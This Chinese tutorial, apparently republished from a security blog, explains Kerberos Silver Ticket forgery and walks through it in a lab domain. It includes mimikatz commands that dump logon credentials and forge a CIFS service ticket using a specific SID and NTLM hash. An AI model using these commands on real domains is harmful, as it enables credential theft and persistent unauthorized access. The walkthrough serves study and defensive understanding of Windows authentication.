域渗透 | 白银票据利用

目录

0x01 介绍

0x02 白银票据利用

0x01 介绍

在之前的文章中，我们详细探讨了Kerberos认证的流程，现在我们将深入讨论如何利用这一流程，特别是关于白银票据伪造（Silver Tickets）的技术。白银票据伪造主要利用了Kerberos认证的第三个步骤，在这个步骤中，客户端会携带ticket向服务器的某个服务发起请求。如果验证通过，客户端即可访问服务器上的特定服务。ticket的格式如下：

Server hash(server session key + client info + end time)

其中，client info是我们已知的，end time可以根据当前时间进行伪造，server session key由TGS生成。在ticket发送给服务器之前，服务器并不知道server session key的具体内容。因此，只要我们掌握了server hash，就可以访问服务器中的特定服务。

实际上，这种方法更像是一种后门，当我们拥有server hash时，可以随时向服务器发起请求。

总结白银票据攻击的特点如下：

1. 不需要与KDC进行交互
2. 需要服务器的NTLM hash

0x02 白银票据利用

我们将通过文件共享的方式来验证白银票据的利用。首先，尝试访问\WIN7-SERVER.zhujian.comc$，发现需要输入密码才能连接。

接着，我们使用mimikatz从服务器中导出hash：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

成功获取了hash和其他相关信息。

然后回到客户端，使用mimikatz伪造票据，命令如下：

mimikatz "kerberos::golden /domain: /sid: /target: /service: /rc4:<ntlmhash> /user: /ptt" exit</ntlmhash>

相关信息的获取如下：

小绿鲸英文文献阅读器

英文文献阅读器，专注提高SCI阅读效率

352

查看详情

注意，SID不需要填写最后的-500。目标服务器的主机名应使用完整名称：

服务类型可从以下选项中选择，由于没有TGT来不断申请ticket，我们只能针对特定服务进行伪造：

用户名可以任意填写，因为在数据传输到服务器之前，服务器并不知道用户名。对于传输流程不熟悉的读者，可以参考《Windows认证 | 域认证》。

最终，我们得到的命令如下：

mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:S-1-5-21-829259175-2571685386-1296789624 /target: WIN7-SERVER.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit

再次进行测试：

成功访问了服务器。

如果对Windows认证感兴趣，可以阅读以下文章进行学习：《Windows认证 | Windows本地认证》、《Windows认证 | 网络认证》、《Windows认证 | 域认证》、《SPN扫描》、《Kerberoasting攻击》。

推荐阅读：

• 离线破解Navicat密码
• php-fpm在nginx特定环境下的任意代码执行漏洞（CVE-2019-11043）
• Linux权限详解
• Linux文件查找命令详解
• Linux重定向及反弹shell详解

如果本文对你有帮助，请点击“在看”或转发，这对我是一种支持。

以上就是域渗透 | 白银票据利用的详细内容，更多请关注php中文网其它相关文章！